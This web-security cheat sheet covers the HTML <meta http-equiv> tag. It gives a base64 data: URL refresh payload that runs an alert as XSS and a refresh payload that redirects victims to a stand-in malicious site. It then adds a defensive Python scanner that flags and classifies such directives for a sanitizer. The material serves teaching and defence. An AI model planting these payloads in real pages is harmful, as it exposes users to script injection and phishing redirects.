# meta

The [\<meta>](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta) tag represents metadata that cannot be represented by other HTML meta-related elements.

Some `<meta>` tags are informational, for example:

```html
<meta name="name" content="content">
```

And some affect the page in some way, for example:

```html
<meta http-equiv="content-security-policy" content="default-src 'none'; base-uri 'self'">
```

Importantly, CSP does not regulate such `<meta>` elements. `<meta http-equiv=...>` is a tag on the page that can emulate a subset of the functions normally reserved for HTTP response headers. Some of these functions are also available from JavaScript, which CSP already regulates heavily. Dangerous functions that `<meta http-equiv=...>` can perform include:

* set-cookie,
* refresh:
  * redirect to any regular URL,
  * redirect to any data: URL.

> The set-cookie instruction was removed from the standard and is no longer supported at all in Firefox 68 and Chrome 65.

## XSS

We can use a `<meta http-equiv="refresh">` tag whose `content` is `"0;data:..."` (a `data:` URI) to execute arbitrary JavaScript (works only on Safari), for example:

```html
<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" http-equiv="refresh"/>
```

Firefox and Chrome will block this:

* Not allowed to navigate top frame to data URL (Firefox)
* Navigation to toplevel data: URI not allowed (Chrome)

## Open redirect

Using a similar payload, you can redirect the victim to a malicious page:

```html
<meta name="language" content="5;http://malicious-website.com" http-equiv="refresh"/>
```
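Both payloads above share one shape: a `<meta>` element whose `http-equiv` is `refresh` and whose `content` carries a target URL. The scanner below is an added example (not part of this cheat sheet or of any library it references) that a server-side sanitizer or review tool could run over untrusted HTML fragments: it finds `refresh` and `set-cookie` directives regardless of attribute order or case, splits the refresh value into delay and target (both the `5; url=...` form and the bare `0;data:...` form), classifies the target scheme, and returns a verdict. The `SAMPLE` fragment is constructed for the demonstration and reuses the two payload shapes from this page.

```python
"""Flag <meta http-equiv> directives in untrusted HTML fragments.

Added example for this cheat sheet (not code from the original page):
a defender-side scanner built on the standard-library HTMLParser.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


def parse_refresh(content):
    """Split a refresh value into (delay, target).

    Accepts "5; url=http://x" as well as the bare "5;http://x" form used in
    the payloads above. Returns ("", "") when no target is present.
    """
    delay, _sep, rest = content.partition(";")
    target = rest.strip()
    if target.lower().startswith("url="):
        target = target[4:].strip()
    # Browsers tolerate quotes around the URL; strip them so the scheme check sees the real value.
    target = target.strip("'\"")
    return delay.strip(), target


class MetaScanner(HTMLParser):
    """Collect findings for <meta http-equiv=refresh|set-cookie> elements."""

    def __init__(self):
        super().__init__()
        self.findings = []

    # HTMLParser routes self-closing <meta .../> through handle_starttag as well.
    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        # Attribute names are case-insensitive; a valueless attribute yields None.
        a = {k.lower(): (v or "") for k, v in attrs}
        equiv = a.get("http-equiv", "").strip().lower()
        if equiv == "refresh":
            delay, target = parse_refresh(a.get("content", ""))
            self.findings.append({
                "directive": "refresh",
                "delay": delay,
                "target": target,
                "scheme": urlsplit(target).scheme.lower() if target else "",
            })
        elif equiv == "set-cookie":
            self.findings.append({
                "directive": "set-cookie",
                "content": a.get("content", ""),
            })


def scan_meta(html):
    """Return the list of dangerous <meta http-equiv> findings in a fragment."""
    parser = MetaScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def classify(finding):
    """Map a finding to a verdict a sanitizer can act on."""
    if finding["directive"] == "set-cookie":
        return "reject: set-cookie directive (obsolete, strip it anyway)"
    if finding["scheme"] in ("data", "javascript"):
        return "reject: script-capable refresh target"
    if finding["target"]:
        return "reject: refresh to a URL (open redirect)"
    return "warn: refresh without target (forced reload)"


# Constructed sample: the two payload shapes from this page plus a benign <meta>.
SAMPLE = (
    "<p>hello</p>"
    '<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" http-equiv="refresh"/>'
    '<META HTTP-EQUIV="Refresh" CONTENT="5; URL=http://malicious-website.com">'
    '<meta name="description" content="benign">'
)

if __name__ == "__main__":
    for f in scan_meta(SAMPLE):
        print(f, "->", classify(f))
```

In a real sanitizer the verdict would drive removal of the element; a policy that strips every `<meta http-equiv>` from user-supplied HTML is simpler and loses nothing, since the directives have no legitimate use inside untrusted fragments.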

## References

* [\<meta> and \<iframe> tags chained to SSRF](https://medium.com/@know.0nix/hunting-good-bugs-with-only-html-d8fd40d17b38)
